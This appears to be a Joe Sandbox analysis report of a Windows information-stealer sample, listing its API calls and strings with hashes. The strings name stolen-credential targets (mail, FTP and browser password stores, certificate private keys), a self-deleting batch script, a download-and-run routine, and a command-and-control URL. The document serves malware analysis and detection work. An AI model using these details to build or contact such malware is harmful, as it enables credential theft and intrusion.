11636 405221 11635->11636 11637 401df8 5 API calls 11636->11637 11638 40522e 11637->11638 11639 405245 FindFirstFileA 11638->11639 11639->11627 11640 405264 11639->11640 11641 405272 lstrcmpiA 11640->11641 11642 4052e6 FindNextFileA 11640->11642 11643 40528a 11641->11643 11644 40528c lstrcmpiA 11641->11644 11642->11640 11645 405300 FindClose 11642->11645 11643->11642 11646 401df8 5 API calls 11643->11646 11647 401e4c 6 
API calls 11643->11647 11648 405182 16 API calls 11643->11648 11649 4018b8 LocalFree 11643->11649 11644->11643 11645->11627 11646->11643 11647->11643 11648->11643 11649->11642 11651 40406c 16 API calls 11650->11651 11652 405195 11651->11652 11652->11635 11654 40f3a8 11653->11654 11660 40f329 11653->11660 11654->9902 11655 40f330 RegEnumKeyExA 11656 40f359 RegCloseKey 11655->11656 11655->11660 11656->11654 11658 401df8 5 API calls 11658->11660 11659 401e4c 6 API calls 11659->11660 11660->11655 11660->11658 11660->11659 11662 4018b8 LocalFree 11660->11662 11673 40f178 11660->11673 11662->11660 11664 40f452 11663->11664 11671 40f3cc 11663->11671 11664->9906 11665 40f3d3 RegEnumKeyExA 11666 40f3fc RegCloseKey 11665->11666 11665->11671 11666->11664 11668 401df8 5 API calls 11668->11671 11669 401e4c 6 API calls 11669->11671 11670 40f30d 23 API calls 11670->11671 11671->11665 11671->11668 11671->11669 11671->11670 11672 4018b8 LocalFree 11671->11672 11672->11671 11675 40f188 11673->11675 11674 401d71 6 API calls 11674->11675 11675->11674 11678 4018b8 LocalFree 11675->11678 11680 40f1c4 11675->11680 11692 40f12e 11675->11692 11677 401d71 6 API calls 11677->11680 11678->11675 11679 40f21b 11681 401d71 6 API calls 11679->11681 11683 4018b8 LocalFree 11679->11683 11686 4043dc 2 API calls 11679->11686 11688 40f12e 6 API calls 11679->11688 11690 40f29c 11679->11690 11680->11677 11680->11679 11682 4015cb lstrlen 11680->11682 11684 4018b8 LocalFree 11680->11684 11681->11679 11682->11680 11683->11679 11684->11680 11685 401d71 6 API calls 11685->11690 11686->11679 11687 40f2f3 11687->11660 11688->11679 11689 4015cb lstrlen 11689->11690 11690->11685 11690->11687 11690->11689 11691 4018b8 LocalFree 11690->11691 11691->11690 11701 402abb 11692->11701 11694 40f13f 11695 4015cb lstrlen 11694->11695 11700 40f16f 11694->11700 11696 40f15c 11695->11696 11697 4015cb lstrlen 11696->11697 11698 40f167 11697->11698 11699 4018b8 LocalFree 11698->11699 11699->11700 11700->11675 11702 402ac4 
11701->11702 11703 402aca 11701->11703 11702->11703 11704 402ad0 IsTextUnicode 11702->11704 11703->11694 11705 402af1 11704->11705 11706 402ae1 11704->11706 11720 4018cf LocalAlloc 11705->11720 11710 402a3e 11706->11710 11709 402aef 11709->11694 11711 402a52 WideCharToMultiByte 11710->11711 11712 402a4b 11710->11712 11713 402a6f 11711->11713 11719 402aa1 11711->11719 11712->11709 11721 4018cf LocalAlloc 11713->11721 11715 402a7a 11716 402a7e WideCharToMultiByte 11715->11716 11715->11719 11717 402a9b 11716->11717 11716->11719 11719->11709 11720->11709 11721->11715

                  Control-flow Graph

                  APIs
                  • GetTickCount.KERNEL32 ref: 00410092
                  • wsprintfA.USER32 ref: 004100A0
                  • GetModuleFileNameA.KERNEL32(?,00000104,00000105,00000105,00000105,?,00000105,00410079), ref: 00410100
                  • GetTempPathA.KERNEL32(00000104,?,?,00000104,00000105,00000105,00000105,?,00000105,00410079), ref: 00410116
                  • lstrcat.KERNEL32(?,?), ref: 0041012A
                  • ExitProcess.KERNEL32(?,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,?,?,00000104,00000105,00000105,00000105,?,00000105), ref: 00410143
                  • lstrcpy.KERNEL32(?,?), ref: 0041015A
                  • StrRChrIA.SHLWAPI(?,00000000,0000005C,?,?,?,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,?,?,00000104), ref: 00410166
                  • lstrcpy.KERNEL32(00000001,?), ref: 00410174
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$CountExitFileModuleNamePathProcessTempTicklstrcatwsprintf
                  • String ID: :ktk del %1 if exist %1 goto ktk del %0 $ "%s" $%d.bat$ShellExecuteA$open$shell32.dll
                  • API String ID: 629621046-4169620016
                  • Opcode ID: 385ba1abc110945cb0f9bf7ed72dd57197ca6cb99058a34aa07d24b2a2388ffa
                  • Instruction ID: bbe99b2e40bcb5cc72a16337b87bb18ba9769970c46c0502ba3b244b455d0a69
                  • Opcode Fuzzy Hash: 385ba1abc110945cb0f9bf7ed72dd57197ca6cb99058a34aa07d24b2a2388ffa
                  • Instruction Fuzzy Hash: A0415430B942057BDF1576A18C03FEE7AA7AB85704F24843A7614F62E1DDF94DD0961C

                  Control-flow Graph

                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040EBB6
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040EBEA
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040EEA5
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumOpen
                  • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                  • API String ID: 1332880857-2111798378
                  • Opcode ID: 05c872853d89018179e56d9162724d5ad08c6549d31a9722be98787650cef169
                  • Instruction ID: e6b8c2f4079cbe2db776dc2cebf65675c25a341e0b4d5db889414e5afc04ff2d
                  • Opcode Fuzzy Hash: 05c872853d89018179e56d9162724d5ad08c6549d31a9722be98787650cef169
                  • Instruction Fuzzy Hash: A471943194011CAADF226F51CC02FED7AB6BF04704F1485BAB558750B1DB7A5BA1AF88

                  Control-flow Graph

                  • Graph: basic blocks 40d3be to 40d5bd (rendered control-flow graph not preserved; edge list omitted, API calls listed below)
                  APIs
                  • CertOpenSystemStoreA.CRYPT32(00000000,0041686B), ref: 0040D444
                  • CertEnumCertificatesInStore.CRYPT32(00000000), ref: 0040D45D
                  • lstrcmp.KERNEL32(?,2.5.29.37), ref: 0040D48E
                    • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD
                  • lstrcmp.KERNEL32(?,00416878), ref: 0040D4C6
                  • CryptAcquireCertificatePrivateKey.CRYPT32(00000000,00000000,00000000,?,?,00000000), ref: 0040D4E2
                  • CryptGetUserKey.ADVAPI32(?,?,?), ref: 0040D4FA
                  • CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,00000000,?), ref: 0040D513
                  • CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,?,?,?), ref: 0040D538
                  • CryptDestroyKey.ADVAPI32(?), ref: 0040D576
                  • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040D581
                  • CertCloseStore.CRYPT32(00000000,00000000), ref: 0040D5A9
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: Crypt$CertStore$Exportlstrcmp$AcquireAllocCertificateCertificatesCloseContextDestroyEnumLocalOpenPrivateReleaseSystemUser
                  • String ID: 2.5.29.37
                  • API String ID: 2649496969-3842544949
                  • Opcode ID: ae199dad05ffd2d656b1fff598cd8733706a88330e2e2fe71924447f7fbef6cd
                  • Instruction ID: 4627d1032078a7020cf6d62532d0161f5819a66d9f9987796914407ab25e48c3
                  • Opcode Fuzzy Hash: ae199dad05ffd2d656b1fff598cd8733706a88330e2e2fe71924447f7fbef6cd
                  • Instruction Fuzzy Hash: 50514931900209BADF21AB90DC0AFEEBA76AF44349F148436FA01751F0C779AA94DB58

                  Control-flow Graph

                  • Graph: basic blocks 404e73 to 404ffc (rendered control-flow graph not preserved; edge list omitted, API calls listed below)
                  APIs
                  • FindFirstFileA.KERNEL32(00000000,?), ref: 00404EE3
                  • lstrcmpiA.KERNEL32(00414F7E,?), ref: 00404F0C
                  • lstrcmpiA.KERNEL32(00414F80,?), ref: 00404F29
                  • FindNextFileA.KERNEL32(?,?,?,.ini,00000000,?), ref: 00404FD8
                  • FindClose.KERNEL32(?,?,?,?,.ini,00000000,?), ref: 00404FEB
                    • Part of subcall function 00401DF8: lstrlen.KERNEL32(?), ref: 00401E19
                    • Part of subcall function 00401DF8: lstrlen.KERNEL32(00000000,?), ref: 00401E23
                    • Part of subcall function 00401DF8: lstrcpy.KERNEL32(00000000,?), ref: 00401E37
                    • Part of subcall function 00401DF8: lstrcat.KERNEL32(00000000,00000000), ref: 00401E40
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
                  • String ID: *.*$.ini$Sites\$\*.*
                  • API String ID: 3040542784-999409347
                  • Opcode ID: fe6739dd0c4f80b05f800ac37b6e33aa946d2008265589ac841af6840cfd1950
                  • Instruction ID: 2941bf432101725d70f5757804a4ebc5995094765b8e32c852607719a5cea155
                  • Opcode Fuzzy Hash: fe6739dd0c4f80b05f800ac37b6e33aa946d2008265589ac841af6840cfd1950
                  • Instruction Fuzzy Hash: 8D3163B090020AAADF11BF61CC42BEE77A9AF80304F1045B7F518B51E1D77C9EC1AE99

                  Control-flow Graph

                  APIs
                  • GetVersionExA.KERNEL32(0000009C), ref: 00404646
                  • GetLocaleInfoA.KERNEL32(00000400,00001002,?,000003FF,00000400,0000009C), ref: 004046CB
                  • GetLocaleInfoA.KERNEL32(00000400,00001001,?,000003FF,00000400,00001002,?,000003FF,00000400,0000009C), ref: 004046F4
                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,00000000,00000400,00001001,?,000003FF,00000400,00001002,?,000003FF,00000400,0000009C), ref: 004047A9
                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 004047C8
                  • GetNativeSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll,?,00000000,00000400,00001001,?,000003FF,00000400,00001002,?,000003FF,00000400,0000009C), ref: 004047D8
                  • GetSystemInfo.KERNEL32(?,kernel32.dll,?,00000000,00000400,00001001,?,000003FF,00000400,00001002,?,000003FF,00000400,0000009C), ref: 004047E6
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: Info$LocaleSystem$AddressHandleModuleNativeProcVersion
                  • String ID: GetNativeSystemInfo$HWID$kernel32.dll
                  • API String ID: 1787888500-92997708
                  • Opcode ID: 98922111a5c18bbd0df1221ed014f99984a947c09b0d63f2c567c8149e73ab3a
                  • Instruction ID: 7c31074f632134472dcc05d9285869f9d737ea1e12c753ccd0a87b8a6cf53fef
                  • Opcode Fuzzy Hash: 98922111a5c18bbd0df1221ed014f99984a947c09b0d63f2c567c8149e73ab3a
                  • Instruction Fuzzy Hash: E1518671A00218BEEF217B61CC42F9D7A35AF81308F0040BBB649790E1D7B95ED19F5A
                  APIs
                  • FindFirstFileA.KERNEL32(00000000,?), ref: 00408B3A
                  • lstrcmpiA.KERNEL32(00414F7E,?), ref: 00408B6D
                  • lstrcmpiA.KERNEL32(00414F80,?), ref: 00408B87
                  • StrStrIA.SHLWAPI(?,opera,00000000,00414F80,?,00414F7E,?,00000000,?), ref: 00408BCC
                  • FindNextFileA.KERNEL32(?,?,00000000,?), ref: 00408BFA
                  • FindClose.KERNEL32(?,?,?,00000000,?), ref: 00408C0D
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$Filelstrcmpi$CloseFirstNext
                  • String ID: \*.*$opera$wand.dat
                  • API String ID: 3663067366-3278183560
                  • Opcode ID: 73ad6621732fd5b1b0d074b55d3e0368f0f7d044ebe32a021b5e90eea4881bd2
                  • Instruction ID: 14270bf5f4a6befa3cb4d8c9ad3f9c77aab47d29b5d3902e72099351859ebbb7
                  • Opcode Fuzzy Hash: 73ad6621732fd5b1b0d074b55d3e0368f0f7d044ebe32a021b5e90eea4881bd2
                  • Instruction Fuzzy Hash: AC312DB090021DAAEF20AB61CD42AE977B5AB44304F0041FBF548B91E1DB78AFC1DF58
                  APIs
                  • FindFirstFileA.KERNEL32(00000000,?), ref: 00404216
                  • lstrcmpiA.KERNEL32(00414F7E,?), ref: 00404243
                  • lstrcmpiA.KERNEL32(00414F80,?), ref: 00404260
                  • FindNextFileA.KERNEL32(?,?,?,00000000,00000000,?), ref: 0040432A
                  • FindClose.KERNEL32(?,?,?,?,00000000,00000000,?), ref: 0040433D
                    • Part of subcall function 00401DF8: lstrlen.KERNEL32(?), ref: 00401E19
                    • Part of subcall function 00401DF8: lstrlen.KERNEL32(00000000,?), ref: 00401E23
                    • Part of subcall function 00401DF8: lstrcpy.KERNEL32(00000000,?), ref: 00401E37
                    • Part of subcall function 00401DF8: lstrcat.KERNEL32(00000000,00000000), ref: 00401E40
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
                  • String ID: *.*$\*.*
                  • API String ID: 3040542784-1692270452
                  • Opcode ID: 7c054c62878c98a29015d5884a0aa70fdad17bcb5f176ccd0d97648684c322da
                  • Instruction ID: 1f47857f422b45aa96da1fbac4a271589fd82444487ea459f7e32dcb795770b9
                  • Opcode Fuzzy Hash: 7c054c62878c98a29015d5884a0aa70fdad17bcb5f176ccd0d97648684c322da
                  • Instruction Fuzzy Hash: DF4160B0600219AADF11AF61CC02AEE3B69AF84344F1041BBFA18750F1D7799AD1EE59
                  APIs
                  • lstrlenW.KERNEL32(?), ref: 0040A71C
                  • wsprintfA.USER32 ref: 0040A79B
                  • lstrlenW.KERNEL32(?,?), ref: 0040A7E1
                  • CryptUnprotectData.CRYPT32(00000000,00000000,?,00000000,00000000,00000001,?), ref: 0040A824
                  • LocalFree.KERNEL32(00000000), ref: 0040A85B
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen$CryptDataFreeLocalUnprotectwsprintf
                  • String ID: %02X$Software\Microsoft\Internet Explorer\IntelliForms\Storage2
                  • API String ID: 1926481713-2450551051
                  • Opcode ID: 250aea4bfc7b2763cee397cb85e4685f67c7bdccd712409840bf091a8d311f9b
                  • Instruction ID: 431ada3711b4cbf09e0058f43ea143bd1b8c6f7f7d2024ed2fa74cfcbe70fe6e
                  • Opcode Fuzzy Hash: 250aea4bfc7b2763cee397cb85e4685f67c7bdccd712409840bf091a8d311f9b
                  • Instruction Fuzzy Hash: BF414D72C1021CEADF11AFA5DC41AEDBB79EF04314F14803AF910B61A1D7799A61CB59
                  APIs
                  • FindFirstFileA.KERNEL32(00000000,?,00000000), ref: 00405252
                  • lstrcmpiA.KERNEL32(00414F7E,?), ref: 00405281
                  • lstrcmpiA.KERNEL32(00414F80,?), ref: 0040529B
                  • FindNextFileA.KERNEL32(?,?,00000000,?,00000000), ref: 004052F3
                  • FindClose.KERNEL32(?,?,?,00000000,?,00000000), ref: 00405306
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$Filelstrcmpi$CloseFirstNext
                  • String ID: \*.*
                  • API String ID: 3663067366-1173974218
                  • Opcode ID: 5d1d2cbe2603c696b2231206718f2c189f088ed98083f807d967af521c828ecb
                  • Instruction ID: fe923e12dd3194ffbfaf4ecf458f4b1e8703c939ae74238161610769ba895d74
                  • Opcode Fuzzy Hash: 5d1d2cbe2603c696b2231206718f2c189f088ed98083f807d967af521c828ecb
                  • Instruction Fuzzy Hash: 0C31FB71900219AADF21AB61CC42AEE77A9EF04308F0045BAF818B51E2D7789BD19F59
                  APIs
                  • LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 004029A3
                  • GetCurrentProcess.KERNEL32 ref: 004029AD
                  • OpenProcessToken.ADVAPI32(00000000,00000020,00000000), ref: 004029BB
                  • AdjustTokenPrivileges.KERNELBASE(00000000,00000000,?,00000010,00000000,00000000), ref: 004029FD
                  • CloseHandle.KERNEL32(00000000), ref: 00402A11
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
                  • String ID:
                  • API String ID: 3038321057-0
                  • Opcode ID: d009cff5696b7f4c186aa4e15d3284577fce5addd6a53109ba68b717834f9f6d
                  • Instruction ID: a219fab04c2577c3fdc3e3711d8b7e1a3bbf213a345a755bd60571ca67a776ce
                  • Opcode Fuzzy Hash: d009cff5696b7f4c186aa4e15d3284577fce5addd6a53109ba68b717834f9f6d
                  • Instruction Fuzzy Hash: 7B1146B1A04209EFEF208F95DD4ABEEBBB4BB40319F108036A151B41D0D7F89A84CF18
                  APIs
                  • OleInitialize.OLE32 ref: 0041051E
                  • GetUserNameA.ADVAPI32(?,00000101), ref: 0041056E
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: InitializeNameUser
                  • String ID: NN@ossy008
                  • API String ID: 2272643758-3608549514
                  • Opcode ID: ee0380db7069c618c67f60cd9f8b317b2d1a5a5dc1e0fcd9c8d36bf9dbea60ee
                  • Instruction ID: 411c7702ac14aaa98d60b8154e5b77ccb9639754c5b591c276c5e0f72daf855e
                  • Opcode Fuzzy Hash: ee0380db7069c618c67f60cd9f8b317b2d1a5a5dc1e0fcd9c8d36bf9dbea60ee
                  • Instruction Fuzzy Hash: C1F0FE705542046DDB20BBB2AD076DE39A69B0070CF14443BB858F51E2DAFD45C4EA6D
                  APIs
                  • SetUnhandledExceptionFilter.KERNEL32 ref: 004105D6
                  • RevertToSelf.ADVAPI32 ref: 00410601
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExceptionFilterRevertSelfUnhandled
                  • String ID:
                  • API String ID: 669012916-0
                  • Opcode ID: 0b2dc2319a9a196d111b0c7210b554ee72de698e49fe6a011752dbbcc5a003c6
                  • Instruction ID: 79391622e25d01b2d077cc46aef248b6e0fee1365510e087247757f2e97d9c79
                  • Opcode Fuzzy Hash: 0b2dc2319a9a196d111b0c7210b554ee72de698e49fe6a011752dbbcc5a003c6
                  • Instruction Fuzzy Hash: B1D048789442498AD7757BF6B80A7DC3650ABC074EF80807FA401105AACFFD25D9CD6E
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 51da6573e3da27ec3b95b0a49ef9c20d22bbf5351cbe70dbe085edc39ec67742
                  • Instruction ID: d5f07a856e824efec72bd6e09ab3cdbbbddd91440c17a4b0cfd9f4b345f0efc4
                  • Opcode Fuzzy Hash: 51da6573e3da27ec3b95b0a49ef9c20d22bbf5351cbe70dbe085edc39ec67742
                  • Instruction Fuzzy Hash: CD11C171608684FFDB225B59CC01F997F75E702B14F544037F80A62DE2C33D8995EA5A

                  Control-flow Graph

                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?), ref: 00405A44
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00405A74
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00405AC2
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumOpen
                  • String ID: Host$Last Server Host$Last Server Pass$Last Server Path$Last Server Port$Last Server Type$Last Server User$Pass$Path$Port$Remote Dir$Server Type$Server.Host$Server.Pass$Server.Port$Server.User$ServerType$User
                  • API String ID: 1332880857-44262141

                  Control-flow Graph

                  APIs
                    • Part of subcall function 00401788: GlobalFix.KERNEL32(?), ref: 004017AC
                    • Part of subcall function 00401788: GlobalUnWire.KERNEL32(?), ref: 004017C4
                  • wsprintfA.USER32 ref: 0040FEEA
                  • GetTempPathA.KERNEL32(00000104,?,00000000,00000000,00000002), ref: 0040FF5D
                  • GetTickCount.KERNEL32 ref: 0040FF75
                  • wsprintfA.USER32 ref: 0040FF87
                  • CreateDirectoryA.KERNEL32(?,00000000), ref: 0040FF98
                  • lstrlen.KERNEL32(true,?,00000000), ref: 00410000
                  • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00410029
                    • Part of subcall function 00401DF8: lstrlen.KERNEL32(?), ref: 00401E19
                    • Part of subcall function 00401DF8: lstrlen.KERNEL32(00000000,?), ref: 00401E23
                    • Part of subcall function 00401DF8: lstrcpy.KERNEL32(00000000,?), ref: 00401E37
                    • Part of subcall function 00401DF8: lstrcat.KERNEL32(00000000,00000000), ref: 00401E40
                  • API ID: lstrlen$Globalwsprintf$CountCreateDirectoryExecutePathShellTempTickWirelstrcatlstrcpy
                  • String ID: %02X$%d.exe$MZ$http://dillion0mill.favcc1.com/gate.php$open$true
                  • API String ID: 2046336982-3971612383

                  Control-flow Graph

                  APIs
                  • RegOpenKeyA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,?), ref: 00402126
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00402166
                  • lstrlen.KERNEL32(?,00000000,00000000,00000000,?,00000000,?,00000FFF,00000000,00000000,00000000,00000000,?,00000000,?,00000FFF), ref: 00402219
                  • lstrlen.KERNEL32(?,00000000,?,00000000,?,00000FFF,00000000,00000000,00000000,00000000,?,00000000,?,00000FFF,00000000,00000000), ref: 00402252
                    • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00402289
                  • GlobalFix.KERNEL32(?), ref: 004022E5
                  • GlobalUnWire.KERNEL32(?), ref: 00402304
                  • GlobalFix.KERNEL32(?), ref: 00402346
                  • GlobalUnWire.KERNEL32(?), ref: 00402365
                    • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD
                  • API ID: Global$LocalWirelstrlen$AllocCloseEnumFreeOpen
                  • String ID: DisplayName$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                  • API String ID: 3331298335-981893429

                  Control-flow Graph

                  • APIs on graph: GetCurrentProcess, OpenProcessToken, GetTokenInformation, GetLastError, CloseHandle, ConvertSidToStringSidA, lstrcmp, LocalFree
                  • API ID:
                  • String ID: S-1-5-18
                  • API String ID: 0-4289277601

                  Control-flow Graph

                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?), ref: 004066A5
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 004066D9
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040690C
                  • API ID: CloseEnumOpen
                  • String ID: Host$InitialPath$Login$Password$PasswordType$Port
                  • API String ID: 1332880857-4069465341

                  Control-flow Graph

                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040D085
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 0040D0B9
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 0040D2C2
                  • API ID: CloseEnumOpen
                  • String ID: InitialDirectory$Password$PortNumber$ServerName$ServerType$UserID
                  • API String ID: 1332880857-2649023343

                  Control-flow Graph

                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00407BCD
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407C01
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407E17
                  • API ID: CloseEnumOpen
                  • String ID: FSProtocol$HostName$Password$PortNumber$RemoteDirectory$UserName
                  • API String ID: 1332880857-3874328862

                  Control-flow Graph

                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040DC75
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040DCA9
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040DE92
                  • API ID: CloseEnumOpen
                  • String ID: FTP destination catalog$FTP destination password$FTP destination port$FTP destination server$FTP destination user$FTP profiles
                  • API String ID: 1332880857-3620412361

                  Control-flow Graph

                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00407F1F
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407F53
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040811B
                  • API ID: CloseEnumOpen
                  • String ID: PassWord$Port$RootDirectory$ServerType$Url$UserName
                  • API String ID: 1332880857-2128033141

                  Control-flow Graph

                  APIs
                  • RegCreateKeyA.ADVAPI32(Software\WinRAR,?), ref: 004026F8
                  • RegSetValueExA.ADVAPI32(?,?,00000000,00000003,?,?), ref: 00402711
                  • RegCloseKey.ADVAPI32(?,?,?,00000000,00000003,?,?), ref: 0040271E
                  • GetTempPathA.KERNEL32(00000104,?), ref: 00402737
                  • CreateDirectoryA.KERNEL32(?,00000000,00000104,?), ref: 00402758
                  • ExitProcess.KERNEL32(?,C0000000,00000003,00000000,00000002,00000000,00000000,?,00000000,00000104,?), ref: 004027B3
                  • CloseHandle.KERNEL32(?,?,C0000000,00000003,00000000,00000002,00000000,00000000,?,00000000,00000104,?), ref: 004027D1
                  • DeleteFileA.KERNEL32(?,?,C0000000,00000003,00000000,00000002,00000000,00000000,?,00000000,00000104,?), ref: 004027E0
                  • API ID: CloseCreate$DeleteDirectoryExitFileHandlePathProcessTempValue
                  • String ID: Software\WinRAR
                  • API String ID: 2428708885-224198155
                  APIs
                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040506F
                    • Part of subcall function 00401DF8: lstrlen.KERNEL32(?), ref: 00401E19
                    • Part of subcall function 00401DF8: lstrlen.KERNEL32(00000000,?), ref: 00401E23
                    • Part of subcall function 00401DF8: lstrcpy.KERNEL32(00000000,?), ref: 00401E37
                    • Part of subcall function 00401DF8: lstrcat.KERNEL32(00000000,00000000), ref: 00401E40
